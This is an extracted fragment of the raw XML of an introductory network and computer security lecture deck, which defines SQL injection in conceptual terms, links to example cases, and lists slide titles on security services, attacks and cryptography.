                        </a:rPr>
                        <a:t>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="15240" marR="15240" marT="15251" marB="15251" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3501008"/>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Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. This can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including execution of system commands.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" sz="20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smtClean="0"/>
              <a:t>THREAT - EXAMPLE</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="1557338"/>
            <a:ext cx="8686800" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://goo.gl/8Xnnn0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Ritaglio scherma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085" y="2852936"/>
            <a:ext cx="7092280" cy="3824268"/>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erra">
  <a:themeElements>
    <a:clrScheme name="Terra">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erra">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erra">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Terra">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Trek</Template>
  <TotalTime>4591</TotalTime>
  <Words>4670</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Presentazione su schermo (4:3)</PresentationFormat>
  <Paragraphs>328</Paragraphs>
  <Slides>39</Slides>
  <Notes>36</Notes>
  <HiddenSlides>3</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39</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="49" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>Franklin Gothic Medium</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Terra</vt:lpstr>
      <vt:lpstr>Network &amp; Computer Security – An introduction</vt:lpstr>
      <vt:lpstr>InformaTION</vt:lpstr>
      <vt:lpstr>ExaM procedure</vt:lpstr>
      <vt:lpstr>Course PrograM</vt:lpstr>
      <vt:lpstr>NERD THING of the day</vt:lpstr>
      <vt:lpstr>DICTIONARY - I</vt:lpstr>
      <vt:lpstr>DICTIONARY - II</vt:lpstr>
      <vt:lpstr>WEAKNESS - EXAMPLE</vt:lpstr>
      <vt:lpstr>THREAT - EXAMPLE</vt:lpstr>
      <vt:lpstr>THREAT - EXAMPLE</vt:lpstr>
      <vt:lpstr>ATTACK - EXAMPLE</vt:lpstr>
      <vt:lpstr>DICTIONARY - III</vt:lpstr>
      <vt:lpstr>Key Security Concepts</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>PARANOID vs unsecured</vt:lpstr>
      <vt:lpstr>Passive Attacks</vt:lpstr>
      <vt:lpstr>Active Attacks</vt:lpstr>
      <vt:lpstr>Security Service</vt:lpstr>
      <vt:lpstr>Security Services (X.800)</vt:lpstr>
      <vt:lpstr>Security Mechanism</vt:lpstr>
      <vt:lpstr>Security Mechanisms (X.800)</vt:lpstr>
      <vt:lpstr>Model for Network Security</vt:lpstr>
      <vt:lpstr>Model for Network Access Security</vt:lpstr>
      <vt:lpstr>FOOD of the day</vt:lpstr>
      <vt:lpstr>LOGICAL FALLACY of the day</vt:lpstr>
      <vt:lpstr>LOGICAL FALLACY of the day</vt:lpstr>
      <vt:lpstr>Cryptography and Network Security Chapter 1</vt:lpstr>
      <vt:lpstr>Roadmap</vt:lpstr>
      <vt:lpstr>Standards Organizations</vt:lpstr>
      <vt:lpstr>Chapter 1 – Introduction</vt:lpstr>
      <vt:lpstr>Computer Security</vt:lpstr>
      <vt:lpstr>Levels of Impact</vt:lpstr>
      <vt:lpstr>Examples of Security Requirements</vt:lpstr>
      <vt:lpstr>Computer Security Challenges</vt:lpstr>
      <vt:lpstr>OSI Security Architecture</vt:lpstr>
      <vt:lpstr>Security Services</vt:lpstr>
      <vt:lpstr>Model for Network Security</vt:lpstr>
      <vt:lpstr>Model for Network Access Security</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>School of Eng &amp; IT,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dc:subject>
  <dc:creator>Dr Lawrie Brown</dc:creator>
  <cp:lastModifiedBy>Dave</cp:lastModifiedBy>
  <cp:revision>81</cp:revision>
  <cp:lastPrinted>2005-09-02T04:15:44Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-04T00:04:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-02-25T18:02:16Z</dcterms:modified>
</cp:coreProperties>
</file>